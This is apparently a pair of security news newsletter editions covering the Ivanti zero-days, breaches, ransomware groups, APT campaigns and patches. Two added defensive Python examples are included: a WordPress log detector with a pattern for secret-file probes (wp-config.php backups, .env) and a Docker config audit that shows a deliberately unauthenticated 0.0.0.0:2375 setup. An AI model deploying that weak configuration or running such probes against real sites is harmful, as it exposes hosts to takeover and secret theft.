  • Ivanti said that CVE-2024-21893 was also exploited in the wild. Neither the company nor Volexity, Mandiant, or other security firms linked this zero-day to the Chinese APT or any other threat actor.

  • With the release of the firmware updates, the company also updated its mitigations file.

  • Ivanti also told customers to factory reset their devices before applying the firmware patch, as a way to prevent attackers from remaining on infected devices.

  • The company's firmware update covers only recent Connect Secure versions, and patches for older versions are scheduled for the coming weeks.

  • The same vulnerabilities also affect Ivanti Policy Secure network gateways, although no attacks have been reported against these systems so far.

  • In light of the Ivanti update, CISA has told federal agencies to disconnect affected Ivanti instances from their networks by Saturday, February 3. Agencies are allowed to reconnect devices only if they've been factory reset and updated according to Ivanti's instructions.


Breaches, hacks, and security incidents

Ripple founder hacked: A threat actor has hacked and stolen $112.5 million worth of crypto-assets from Chris Larsen, the co-founder and executive chairman of the Ripple (XRP) cryptocurrency. Larsen confirmed the hack and said that only personal accounts were affected. Even if Ripple Labs accounts were not affected, Ripple's price dropped 5% in the aftermath of the hack. [Additional coverage in CoinTelegraph]

Binance leak: Congratulations to Binance for leaving sensitive source code and internal passwords exposed on GitHub for months. [Additional coverage in 404 Media]

GAC data breach: The Canadian government is investigating a security breach at its foreign affairs department. A spokesperson for Global Affairs Canada (GAC) says the agency has restricted remote access to some of its networks following the detection of "malicious cyber activity." The breach took place on January 24 and impacted the department's network across Canada. Overseas embassies and consulates are not affected. [Additional coverage in The Canadian Press]

Mexico government hack: A threat actor has breached the account of a Mexican government employee and has stolen the personal details of 263 journalists. The hacker is believed to have stolen data such as names, home addresses, and copies of passports and voter ID cards. Government officials say the breach took place on January 22 and impacted journalists accredited to attend the President's daily press conferences. [Additional coverage in Reuters]

Pegasus in Jordan: Researchers from Access Now, Citizen Lab, and Human Rights Watch have found traces of the Pegasus spyware on the smartphones of 35 individuals in Jordan. Targeted victims include journalists, political activists, civil society members, and human rights lawyers. The earliest infections date back to March 2021, while the latest was in October 2023. Researchers say Pegasus was installed using PWNYOURHOME, FINDMYPWN, FORCEDENTRY, and BLASTPASS, all known zero-click exploits linked to the NSO Group, the spyware's maker.

Table with victim categories in the Jordan attacks

General tech and privacy

Uber GDPR fine: American ride-hailing and food delivery company Uber was fined €10 million by the Dutch data protection agency for breaking the EU's GDPR rules. The agency says Uber made it unnecessarily complicated for drivers to see how and where their data was used and shared. Besides Dutch drivers, the agency says it received complaints from France as well.

M365 Rust rewrite: Microsoft is hiring engineers to help it rewrite its Microsoft 365 platform in Rust as part of an effort to modernize its services.

CAA for S/MIME: The CA/Browser Forum has voted to require certificate authorities to support Certification Authority Authorization (CAA) for S/MIME certificates.

Fastly moves to BoringSSL: CDN provider Fastly has migrated from OpenSSL to BoringSSL.

Pixel passkey upgrade: Google has updated the built-in password manager on its Pixel smartphones to scan saved accounts and tell users which online services support passkeys. If passkey-compatible accounts are found, the Pixel Password Manager will prompt users to add passkeys to the accounts just by tapping a few buttons.

Images showing steps to add a passkey via the Pixel password manager

Government, politics, and policy

Children Online Safety Senate hearing: The CEOs of Discord, Meta, Snap, Twitter, and TikTok testified in front of a US Senate Judiciary Committee on how they protect children on their platforms. Let's just say all five got an earful from the present Senators since the platforms have done a terrible job so far. [Additional coverage in CNBC, The Record]

CISA SbD alert: CISA has asked SOHO router vendors to overhaul procedures and take security features into account when designing new products. The agency has urged vendors to include a firmware update mechanism in their routers and ship devices that have security features enabled by default. In addition, the agency also asked vendors to ship routers where the web management interface is only accessible from the internal LAN. CISA's requests are part of its Secure-by-Design initiative and were published on the same day the US disrupted a Chinese botnet of compromised SOHO routers.

White House OS3I report: The Biden Administration has published its year-in-review report covering the Open-Source Software Security Initiative (OS3I), a crucial component of its new National Cybersecurity Strategy. The 7-page document aggregates all of OS3I's efforts last year to secure open-source software and its impact on software supply chains.

SEC cybersecurity rules: The White House has told the Senate that President Biden would veto any attempts to walk back the SEC's new cybersecurity rules. [Additional coverage in The Record]

GAO ICS ransomware report: A GAO report found that federal agencies for critical sectors like manufacturing, energy, healthcare, and transportation systems are mostly blind to how companies in their industry vertical can deal with a ransomware attack. [Additional coverage in CyberScoop]

EUCC launched: The EU has formally launched the European Common Criteria-based cybersecurity certification scheme (EUCC), a cybersecurity certification framework for ICT (Information and Communication Technology) products, such as routers and other electronics. The scheme is based on the Common Criteria international standard.

EU commits to not pay ransoms: During a visit to Washington this week, EU Commissioner Thierry Breton formally committed the EU and its 27 member states to the Counter Ransomware Initiative. As part of this project, member states have pledged not to pay ransoms to cyber criminals extorting companies. More than 50 countries across the world pledged to support the project, although none have passed laws officially banning ransom payments yet.

EU-US cybersecurity cooperation: The EU and US had a meeting in Brussels to enhance their cooperation in cyberspace.

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Bradon Rogers, Chief Customer Officer at enterprise browser Island, on how a modern enterprise browser solution like Island can be used to replace, complement, or enhance some enterprise security tools or technology stacks.

Cybercrime and threat intel

Operation Synergia: Interpol has detained 30 individuals as part of a global operation against malicious server infrastructure that enabled phishing, ransomware, and banking malware operations. The arrests took place between September and November 2023 and were part of Interpol's Operation Synergia. Twenty-six suspects were detained across Europe, and another four in South Sudan and Zimbabwe. According to Group-IB, Interpol and national security agencies managed to take down 70% of the servers they initially targeted.

Banner with stats for Operation Synergia

DraftKings hacker sentenced: A New York judge has sentenced a 19-year-old from Wisconsin to 18 months in prison for his role in hacking user accounts on sports betting website DraftKings. According to prosecutors, Joseph Garrison used credential-stuffing attacks to take over accounts and then steal user funds. The teenager hacked more than 60,000 DraftKings accounts and stole $600,000 from around 1,600 of the site's users. Days before Garrison's sentencing, US authorities arrested and charged two other suspects involved in the attacks. The two helped Garrison sell the hacked accounts on their online cybercrime shops.

BTC-e arrest: The US Department of Justice has charged a Belarusian and Cypriot national for his role in operating BTC-e, a now-defunct cryptocurrency exchange that helped launder ransomware proceeds. Aliaksandr Klimenka, 42, was arrested in Latvia on December 21, 2023, and extradited and arraigned in a US court this week. He faces up to 25 years in prison on money laundering charges and for operating an unlicensed money services business. Klimenka is the second BTC-e operator to be detained after Russian national Alexander Vinnik, the platform's founder. Vinnik was detained in Greece in 2017 and extradited to the US in 2022.

Pig-butchering leaders arrested: Chinese officials have arrested ten Myanmar nationals who allegedly operated large-scale cyber scam centers in Myanmar's northern Kokang region. The suspects were detained after China issued an international arrest warrant in their names at the start of December last year. All ten are believed to have had leadership roles in running the scam centers, and some were also members of the Kokang Border Guard Force. The suspects were handed over to Chinese authorities on January 30.

Headshots for the ten suspects
Image via Irrawaddy

Russian mathematician arrested: The FSB has arrested a mathematician named Artem Khoroshilov for launching DDoS attacks against Russian critical infrastructure. [Additional coverage in TASS]

Akira exploits Cisco devices: The Akira ransomware gang is using a four-year-old vulnerability (CVE-2020-3259) in Cisco ASA and FTD devices as a way to breach corporate networks.

RansomedVC rebrand: The RansomedVC ransomware operation has rebranded under the new name of Raznatovic. The group's name change comes after the gang ruined its brand throughout 2023 by lying about many of its intrusions. RansomedVC's lies reached a peak in October 2023 when American insurance company State Farm was sued in a class-action lawsuit over a breach that never occurred. According to a new report from Analyst1's Jon DiMaggio, the group appears to be run by a Bulgarian national who previously worked as part of the now-defunct Ragnar Locker ransomware operation.

Rebranding message listed on the RansomedVC website

New DaaS project: CyFirma looks at CG, a new Drainer-as-a-Service project that provides access to a phishing kit specialized in compromising and draining cryptocurrency wallets.

ApateWeb: Palo Alto Networks has discovered a network of over 130,000 domains that are being used to deliver scareware, online scams, adware, and rogue browser extensions. The domains appear to be part of a coordinated campaign the company has called ApateWeb. The campaign has been active since August 2022 and appears to be primarily driven by malicious JavaScript code implanted on the compromised domains.

UNC4990: A financially motivated threat actor has been targeting organizations in Italy using a malware strain that spreads via USB devices. Tracked as UNC4990, the group has been active since early 2023. Its primary malware is a downloader named EMPTYSPACE (aka VETTA Loader and BrokerLoader), which has been used to later deploy a backdoor named QUIETBOARD and cryptocurrency miners. The group's operations also stand out because of their use of Vimeo and tech news site ArsTechnica to host some parts of their malware.

State of WordPress 2023: Credential stuffing attacks have been the most common type of attack against WordPress sites in 2023. WordPress firewall provider Wordfence says it blocked more than 100 billion credential stuffing attempts throughout the year. Scans for exposed configuration files were the second most popular attack vector, while vulnerability exploitation was third. Wordfence notes that 2023 marked the first time that the exploitation of XSS vulnerabilities was the most popular vulnerability type. The company blames this on the rise of more sophisticated payloads designed to insert malicious administrative users and install backdoors via unpatched XSS bugs in themes and plugins.

Chart with the most common exploit attempts against WordPress sites
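The two attack types Wordfence ranks highest, credential stuffing against wp-login.php and scans for exposed configuration files, both leave a recognisable trace in an ordinary web server access log. The following added example (not code from Wordfence or from this newsletter) shows a minimal detector for both over a handful of constructed combined-format log lines; the IP addresses, timestamps and the five-failure threshold are assumptions chosen for the illustration, and the detection relies on WordPress answering a failed login POST with a 200 and a successful one with a 302 redirect.

```python
import re
from collections import Counter, defaultdict

# Combined-log-format line, e.g.:
# 203.0.113.7 - - [01/Feb/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3421
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Requests for backups or copies of wp-config.php (or a stray .env) rather than
# the live file, which the PHP engine would execute instead of serving.
CONFIG_PROBE_RE = re.compile(r'(?i)(?:/wp-config\.php(?:\.\w+|~)|/\.env)$')


def parse_line(line):
    """Return a dict with ip, method, path (query stripped) and int status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines, stuffing_threshold=5):
    """Summarise credential-stuffing and config-probe activity per source IP.

    WordPress answers a failed POST to wp-login.php with a 200 (the form is
    re-rendered) and a successful one with a 302 redirect to wp-admin, so a run
    of 200s followed by a 302 from the same IP is the signature of a stuffing
    attempt that found a working username/password pair.
    """
    failed_logins = Counter()
    success_after_stuffing = set()
    config_probes = defaultdict(list)

    for rec in map(parse_line, lines):
        if rec is None:  # unparsable line: skip it rather than abort the run
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path.endswith("/wp-login.php"):
            if rec["status"] == 200:
                failed_logins[ip] += 1
            elif rec["status"] == 302 and failed_logins[ip] >= stuffing_threshold:
                success_after_stuffing.add(ip)
        elif CONFIG_PROBE_RE.search(path):
            config_probes[ip].append(path)

    return {
        "credential_stuffing": {ip: n for ip, n in failed_logins.items() if n >= stuffing_threshold},
        "stuffing_then_success": sorted(success_after_stuffing),
        "config_probes": dict(config_probes),
    }


# Constructed sample log using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Feb/2024:10:00:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3421'
    for i in range(6)
] + [
    '203.0.113.7 - - [01/Feb/2024:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '198.51.100.9 - - [01/Feb/2024:10:01:00 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 196',
    '198.51.100.9 - - [01/Feb/2024:10:01:01 +0000] "GET /.env HTTP/1.1" 404 196',
    '192.0.2.5 - - [01/Feb/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3421',
    '192.0.2.5 - - [01/Feb/2024:10:02:30 +0000] "GET /wp-config.php HTTP/1.1" 200 0',
    'not a log line',
]

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

A single failed login from 192.0.2.5 stays below the threshold and a request for the live wp-config.php is not counted as a probe, so only the six-failure run from 203.0.113.7 (which then succeeds) and the backup-file requests from 198.51.100.9 are reported; in production the threshold would be applied per time window rather than over the whole file.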

Malware technical reports

Trigona to Mimic: AhnLab researchers have spotted the operators of the Trigona ransomware installing the Mimic ransomware on compromised MS-SQL servers.

Play ransomware: CyberArk has published a technical analysis of the Play ransomware encrypter.

Nitrogen: Malwarebytes has an update on Nitrogen, a malware spotted last year (Sophos, Bitdefender, eSentire, and Trend Micro), deployed via malicious ads, and used in attacks on corporate networks.

RedLine Stealer: Security researcher Ayush Anand has published a report on a RedLine Stealer sample seen in a recent phishing campaign.

Grandoreiro: ESET has published another technical report on Grandoreiro, the banking trojan they discovered in 2020 and recently helped Brazilian authorities take down.

DiceLoader: Sekoia researchers have published a report on DiceLoader, a malware loader used by the FIN7 cybercrime group.

DIRTYMOE (PurpleFox): Ukraine's CERT team says that more than 2,000 computers across the country have been infected with a malware strain named DIRTYMOE. Also known as PurpleFox, the malware has been around since 2018 but had mainly been active in China. Its operators began expanding in September 2023, when Proofpoint saw the first signs of operations targeting international users. Per Proofpoint's description, PurpleFox appears to be a MaaS.

"Proofpoint does not attribute all the Chinese-themed malware campaigns to the same threat actor at this time, but some activity clusters do overlap, suggesting threat actors may be using the same infrastructure to deliver multiple malware families."

FritzFrog: Akamai has discovered a new variant of the FritzFrog botnet that has now incorporated exploits for the Log4Shell vulnerability.

Commando Cat: Cado Security has discovered a new cryptomining botnet named Commando Cat that is currently targeting Docker servers. The botnet targets Docker instances that have their API endpoints exposed online. Once they compromise a host, the attacker escapes the container and runs malicious code on the underlying Docker host. 
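The precondition for a Commando Cat compromise is a Docker daemon whose API is reachable over the network without authentication. As an added example that is not from Cado Security or from this newsletter, the following Python audits a daemon.json document and flags TCP listeners that lack TLS client verification or bind to every interface, with a constructed weak configuration shown next to a hardened one; the file contents, addresses and certificate paths are assumptions made for the illustration.

```python
import json
from urllib.parse import urlsplit

# Constructed daemon.json fragments, not taken from any real host.
# The weak one publishes the unauthenticated API on every interface.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# The hardened one listens on one internal address and requires a client
# certificate signed by the operator's CA before any API call is accepted.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

# Bind addresses that mean "every interface", IPv4 and IPv6 forms included.
WILDCARD_HOSTS = {"", "0.0.0.0", "::", "*"}


def audit_daemon_config(text):
    """Return a list of findings for the TCP listeners in a daemon.json document.

    Unix sockets are skipped: they are gated by file permissions, not the network.
    """
    cfg = json.loads(text)
    findings = []
    tls_verify = bool(cfg.get("tlsverify"))
    for entry in cfg.get("hosts", []):
        url = urlsplit(entry)
        if url.scheme != "tcp":
            continue
        if not tls_verify:
            # Without tlsverify anyone who can reach the port has root-equivalent
            # control of the host through the container API.
            findings.append(f"{entry}: TCP listener without tlsverify, API is unauthenticated")
        else:
            for key in ("tlscacert", "tlscert", "tlskey"):
                if not cfg.get(key):
                    findings.append(f"{entry}: tlsverify set but {key} is missing")
        if (url.hostname or "") in WILDCARD_HOSTS:
            findings.append(f"{entry}: bound to all interfaces")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"{label}: {audit_daemon_config(doc) or ['no findings']}")
```

The audit only sees what is in daemon.json; dockerd also accepts listeners through `-H` on its command line, typically in the systemd unit's ExecStart, so a complete check covers that file as well, and a firewall rule in front of the port is still worth having even when TLS verification is on.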

HeadCrab 2.0: AquaSec researchers have discovered a new version of HeadCrab, a crypto-mining malware strain known to infect Redis databases. The new version features fileless execution capabilities and a new command and control system. In addition, the malware's author also seems to be running a mini-blog in the malware's code (screenshot below).

The mini blog embedded in the HeadCrab source code

Sponsor Section

Island is an enterprise browser that embeds access policies, data protection, and security controls to create a safe environment that works on unmanaged as well as managed endpoints. Take a look at Island's essential features below [PDF].

https://connect.island.io/hubfs/White%20Papers/Data%20Sheet%20013122_c.pdf

APTs, cyber-espionage, and info-ops

Patchwork's VajraSpy: ESET researchers have found 12 malicious Android apps containing a remote access trojan named VajraSpy. The company linked the apps to Patchwork, a Pakistani APT group. According to ESET, some of the apps managed to reach the Google Play Store, where they were downloaded more than 1,400 times. All apps are still available on third-party Android app stores. ESET identified 148 victims across both India and Pakistan.

Scaly Wolf: Security firm BI.ZONE is tracking a new threat actor named Scaly Wolf and its attacks on Russian organizations using phishing emails disguised as government communications. The final payload in these attacks is White Snake, an infostealer advertised on Telegram and used in a bunch of campaigns all over the place. The group appears to have been active since June 2023. BI.ZONE has not made any attribution about the threat actor yet.

"Continuing to distribute the White Snake stealer almost continuously, the group began to pose a serious threat to Russian businesses. Moreover, the fact that attackers send emails over and over under the guise of government services, especially the Investigative Committee of the Russian Federation, indicates the existence of a working scheme and the success of the ongoing campaigns. Judging by the attacks already committed in January 2024, Scaly Wolf will continue to attempt to compromise Russian companies and may not leave this field for quite some time."

APT28: Security firm Harfang believes that Russian cyber-espionage group APT28 is using a network of compromised Ubiquiti devices to proxy and hide its attacks against government organizations across Eastern Europe. Another report from security firm Trend Micro delves into APT28's (which they call Pawn Storm) use of a Net-NTLMv2 hash relay attack exploiting an Outlook vulnerability tracked as CVE-2023-23397. These attacks were first documented by Microsoft in this report last December.

Midnight Blizzard's attack flow: If you're having problems understanding how Midnight Blizzard (APT29) breached Microsoft's internal corporate email, Wiz researcher Amitai Cohen has you covered.

Infection chain for the Midnight Blizzard attack on Microsoft

Volt Typhoon: In our last newsletter edition, we featured a Reuters exclusive about the US government's efforts to take down hacking infrastructure owned by Chinese APT group Volt Typhoon. The FBI and DOJ officially confirmed this on January 31. As we suspected, the two agencies obtained court orders to take down Volt Typhoon's infamous KV botnet. The top heads of the FBI, CISA, ODNI, and the NSA also appeared in a Senate hearing that discussed China's hacking campaigns targeting US critical infrastructure—embedded below. On the same day, German security firm DCSO also published a technical report on one of the KV botnet's clusters.

Vulnerabilities, security research, and bug bounty

Mastodon security update: The Mastodon project has released a security update to patch a security flaw tracked as CVE-2024-23832.

WordPress security update: The WordPress team has released a security update for the WordPress CMS that fixes two minor vulnerabilities.

Kubernetes security update: Google has released a security update for its Kubernetes engine.

iOS bug exploited in the wild: CISA says that a threat actor is exploiting an old 2022 vulnerability to compromise Apple devices. Tracked as CVE-2022-48618, the bug was initially patched in December 2022 but was only added to Apple's security advisories this year, on January 9. Apple says it received a report that the vulnerability was exploited against versions of iOS released before iOS 15.7.1.

Linux vulnerabilities: Qualys security researchers have discovered a severe vulnerability in the GNU C Library (glibc) that impacts Linux operating systems. Tracked as CVE-2023-6246, the vulnerability affects major distros such as Debian, Fedora, Red Hat, and Ubuntu. The bug impacts versions going back to August 2022 and is an elevation of privilege flaw that can allow attackers with access to a system to get root access on the compromised host.

Vision Pro security update: Three days before its official launch, Apple has shipped the first security update for its Vision Pro VR headset. It's a fix for a WebKit zero-day (CVE-2024-23222) that the company patched last week and has now ported to its new device as well. [h/t Simon Tsui]

Leaky Vessels vulnerability: DevSecOps company Snyk has found four vulnerabilities in Linux-based container deployment tools such as Docker and RunC.

Apache OFBiz vulnerabilities: SecureLayer7 has published root cause analysis reports for several Apache OFBiz vulnerabilities, including one recently abused by the Sysrv botnet.

TP-Link vulnerability: CyFirma has published an analysis on CVE-2024-21833, a vulnerability in TP-Link's Archer and Deco router series discovered by JPCERT/CC.

MySQL RNG issues: The MySQL database—and its MariaDB offshoot—uses a weak RNG function that returns low entropy random numbers with predictable sequences.

EventLogCrasher zero-day: ACROS Security has published a micro-patch for an unpatched vulnerability that can crash the Windows Event Log service on local or remote systems. The company provided the micro-patch after Microsoft declined to patch the issue. The bug could arguably be used to hide malicious behavior on already-compromised systems, since nothing gets logged while the service is down.

Infosec industry

Proofpoint layoffs: Proofpoint is laying off 280 employees, representing roughly 6% of its global workforce. The company becomes the latest cybersecurity vendor to lay off employees over the past few months after Splunk, Truesec, Malwarebytes, Secureworks, and Rapid7.

Okta layoffs: Identity provider Okta announced plans to lay off 400 employees, representing 7% of its staff. The company fired another 300 employees exactly a year ago, on February 1, 2023. [Additional coverage in CybersecurityDive]

Avast/AVG stop working in Russia: The free versions of the Avast and AVG antivirus programs have stopped working for Russian users. The company announced its intention to stop catering to the Russian and Belarusian markets in March 2022, shortly after Russia's invasion of Ukraine. Avast's CCleaner app has also stopped working.

New tool—SmuggleFuzz: Security researcher Charlie Smith has released a free tool named SmuggleFuzz, an HTTP/2-based downgrade and smuggle scanner.

New tool—CSS Canarytoken: Thinkst has launched a new version of its Cloned Website Canarytoken. The new version works via CSS and, just like the first JS-based version, alerts website owners when attackers clone one of their domains for AitM phishing attacks.

Tool update—ANY.RUN: The ANY.RUN platform now supports running and analyzing Linux malware.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how the war in Ukraine is showing how useful mobile devices are in a war. Using them is risky, but those risks need to be managed.

Risky Biz News: Brazilian police arrest Grandoreiro malware gang

31 January 2024 at 00:30

This newsletter is brought to you by enterprise browser maker Island. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Brazil's Federal Police has detained five members of Grandoreiro, a malware gang specialized in stealing funds from banking customers with a custom-built banking trojan.

The group has been active since 2019 and is believed to have stolen at least $3.9 million from customers at banks in Brazil, Mexico, and Spain.

Brazilian officials say Spanish financial institution CaixaBank identified the Grandoreiro members and worked with Interpol and Spanish police to get them detained.

Besides the five arrests, officials raided 13 homes and also seized funds and physical assets owned by the group.

According to reports from ESET, Trustwave, and Zscaler, Grandoreiro is a malware strain written in Delphi and designed to target Windows systems.

It operated by showing popups, manipulating browsers, and capturing keystrokes in order to collect the credentials and cookies needed to access a victim's bank and other online accounts.

Breaches, hacks, and security incidents

GUR hack in Russia: One of Ukraine's military intelligence agencies says it hacked and wiped servers at IPL Consulting, a Russian company that provides IT services for Russia's industrial sector. Officials from Ukraine's Defence Intelligence Main Directorate (GUR) say they wiped more than 60TB of data from dozens of servers and databases. GUR officials say they also worked with a group of "unknown cyber volunteers in Russia" to cripple the infrastructure of Akado-Telekom, an ISP used by the Putin administration, the FSB, the FSO, the Moscow local administration, and Sberbank.

SOMESING crypto-heist: A threat actor has stolen $11.5 million worth of crypto assets from SOMESING, a blockchain-based karaoke platform. The company says it investigated the incident and found no evidence that its staff was involved in any malicious activity. SOMESING says it reported the hack to South Korean law enforcement.

Goledo Finance crypto-heist: Cryptocurrency platform Goledo Finance lost $1.7 million worth of assets in a hack on January 28. The company blamed the loss on a flash loan attack. In a blockchain transaction, Goledo asked the hacker to return the stolen funds for a white hat reward.

Message sent by Goledo to the hacker

Smartmatic legal case: Voting machine maker Smartmatic claims that the president of far-right TV network One America News (OAN) was in possession of a spreadsheet containing passwords of Smartmatic employees. Smartmatic claims OAN President Charles Herring and the network "may have engaged in criminal activities" to obtain the spreadsheet. In a lawsuit filed against OAN, the company says Herring sent the spreadsheet to one of Donald Trump's campaign lawyers in 2021. Smartmatic believes the passwords were used in attempts to access voting systems across the US to prove voter fraud after Trump lost the 2020 election. [Additional coverage in CNN]

Schneider Electric ransomware incident: Energy equipment maker Schneider Electric has fallen victim to a ransomware attack. The incident took place on January 17 and primarily impacted the company's Resource Advisor cloud platform. According to BleepingComputer, the Cactus ransomware group is behind the attack, and they are believed to have stolen terabytes of corporate data.

Romanian govt ransomware incident: A ransomware gang has breached and stolen 250GB of data from the IT systems of Romania's Chamber of Deputies, the country's lower house of Parliament. The Knight ransomware group took credit for the attack in a now-deleted post on their dark web leak site. The group claimed it obtained copies of government contracts, salary information, and copies of national IDs for Romania's top politicians. Romanian officials confirmed the incident for local media after the gang posted national ID copies for the country's prime minister and one of its opposition leaders. [Additional coverage in Hotnews.ro and News.ro]

Screenshot of the now-deleted Knight post

General tech and privacy

Italy finds ChatGPT violates GDPR: Italy's data protection agency has found that OpenAI's ChatGPT system violates the EU's GDPR regulation. The agency issued a temporary ban against ChatGPT in March of last year, alleging that OpenAI was unlawfully collecting user data. Officials have given the company 30 days to file a formal counterclaim before they make a final ruling and impose a fine.

Major IT outage in Russia: A major IT outage took place on Tuesday, January 30, across the Russian internet space due to a DNSSEC error at Russia's .ru national domain registrar. According to Russian tech experts, the outage was likely caused by the government's attempt to create its own national DNS system, separate from the international one.

Android app security update: Google has introduced a new feature for Android app makers that will allow developers to prompt users to update outdated app versions. Google says it introduced the feature after noticing that more than 50% of Android users respond to Play Store prompts. The new system is meant to complement Android's app auto-update and in-app update systems.

Government, politics, and policy

New cybercrime penalties in Italy: The Italian government is working on a law that will raise penalties for cybercrime offenses to between two and 12 years. Harsher penalties will be applied if the cyberattacks affect national security and involve the use of force or public officials. Cybercriminals who cooperate with police can have their sentence reduced by up to two-thirds. Italy's current legislation includes jail terms between one and eight years. [Additional coverage in Reuters]

Farm and Food Cybersecurity Act: US lawmakers have introduced the Farm and Food Cybersecurity Act, new legislation designed to strengthen cybersecurity practices across the US agricultural sector.

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Bradon Rogers, Chief Customer Officer at enterprise browser Island, on how a modern enterprise browser solution like Island can be used to replace, complement, or enhance some enterprise security tools or technology stacks.

Cybercrime and threat intel

ISIS cyber sanctions: The US Treasury Department has sanctioned an Egyptian couple for providing cybersecurity training to ISIS leaders and supporters. US officials say the couple ran the Electronic Horizons Foundation, an online platform also known as Afaq [PDF]. The Afaq site hosted tutorials on how to set up secure computers, how to securely donate cryptocurrency to ISIS, and provided a platform for secure conversations. The Afaq portal shut down in March 2022 in the aftermath of a cyberattack.

Vastaamo hack: In the trial of Julius Aleksanteri Kivimäki, the hacker who extorted patients of the Vastaamo healthcare provider, Finnish authorities claim to have found a way to trace his Monero transactions. Authorities have not released any technical details, and the method remains unclear. [Additional coverage in CoinTelegraph]

"As per the Finnish police, the hacker received payments in Bitcoin and sent the funds to an exchange that was not compliant with Know Your Customer (KYC) guidelines before swapping for Monero and then transferring the funds to a dedicated Monero wallet."

Sosa profile: Infosec reporter Brian Krebs has published a profile on Noah Michael Urban, the 19-year-old from Florida believed to be a member of the Scattered Spider gang. Urban was detained earlier this year.

Former FSB officer trial delayed: The trial of a former FSB officer accused of taking bribes from hackers has been delayed. The former officer from the city of Perm was accused of taking a $1 million bribe from a hacking group to arrange their release from prison and dismissal of their criminal case. He was detained in September 2023.

Major BTC seizure: German authorities have taken custody of more than €2 billion worth of Bitcoin from one of the operators of movie2k.to, a now-defunct movie piracy portal. The funds were voluntarily transferred to officials by the site's programmer, who's been in pre-trial detention since 2019. In 2020, he also handed over control of the site's domain to authorities. Other movie2k.to admins are still at large and are believed to have similar Bitcoin holdings as the staff were early adopters of the cryptocurrency. [Additional coverage in DerSpiegel]

DarkNetLive scandal: A Darkdot article claims that DarkNetLive—the last standing news site covering the dark web—was secretly acquired in November 2022 by Incognito, a darknet drug marketplace. Darkdot claims Incognito has been using the news site to suppress criticism and steer public perception in its favor.

DarkGate via Teams: AT&T's AlienLabs is seeing Microsoft Teams phishing campaigns distributing DarkGate-infected files.

GitHub spam campaign: Code hosting platform GitHub is seeing a rise in cryptocurrency spam after threat actors have found a loophole in the company's defenses. The trick revolves around posting crypto-spam in GitHub commits and issue trackers and then immediately deleting the messages. Project owners receive the spam via email, but because the original content was deleted, they can't report it.

Greatness PhaaS: Trustwave researchers have seen a rise in phishing pages created via the Greatness Phishing-as-a-Service portal.

Phishing kit ecosystem: Guardio Labs looks at the phishing kit ecosystem that's currently flourishing on Telegram channels.

Yahoo Boys: A report from the Network Contagion Research Institute looks at how groups of scammers across West Africa—sometimes referred to as Yahoo Boys—have slowly switched from email financial fraud to social media-enabled sextortion schemes. The report looks at the underground scene that sells sextortion manuals, common tactics and patterns, and how some of these criminals/groups often brag about successful sextortions online without fear or shame. [Additional details in NCRI's report/PDF]

Malware technical reports

Trigona ransomware: The DFIR Report team has published a report on typical Trigona ransomware infections, which usually end with file encryption within 3h.

CrackedCantil: ANY.RUN researcher Lena Y. has published a report on CrackedCantil, a malware strain distributed via cracked and pirated software. The malware appears to work as a downloader for various other threats.

Ermac: IBM's Trusteer team has published a report on Ermac, an Android banking trojan active since September 2022.

Ermac backend panel

Sponsor Section

Island is an enterprise browser that embeds access policies, data protection, and security controls to create a safe environment that works on unmanaged as well as managed endpoints. Take a look at Island's essential features below [PDF].

APTs, cyber-espionage, and info-ops

Volt Typhoon secret takedowns: The US government has taken steps to disable hacking infrastructure used by a Chinese cyber-espionage group named Volt Typhoon. Discovered in early 2023, the group has been linked to intrusions at US government agencies and critical infrastructure operators. Although not confirmed, the secretive takedown most likely targeted KV, an IoT botnet operated by the Volt Typhoon group. [Additional coverage in Reuters]

Russian APT: Security firm Cluster25 says the Russian government is most likely behind a spear-phishing campaign that targeted independent journalists and Russian dissident movements inside and beyond the nation's borders. The campaign took place and was spotted earlier this month by Russian journalists from Bellingcat and The Bell. It consisted of a spear-phishing campaign that attempted to install shells on victims' computers. Details below from our January 15 edition.

China's 2023 APT report: Chinese security firm Qihoo 360 claims that the CIA was the seventh most active APT group in China last year. Qihoo tracked 135 APTs last year, including 46 new groups. The company says that DarkHotel (APT-C-06) and Parasite (APT-C-68) were the two cyber-espionage groups that used the most zero-days last year. [Full report/PDF]

Top 10 most active APTs in China

Vulnerabilities, security research, and bug bounty

Chrome zero-day details: South Korean firm Theori has published a technical breakdown of CVE-2023-2033, a Chrome zero-day that was exploited in the wild and patched in April 2023.

Hitron zero-days: The operators of the InfectedSlurs botnet have used six zero-days in DVRs from South Korean company Hitron Systems. According to internet infrastructure company Akamai, the zero-days were used to infect the Hitron DVRs with DDoS malware. Patches for all six zero-days were released on January 30.

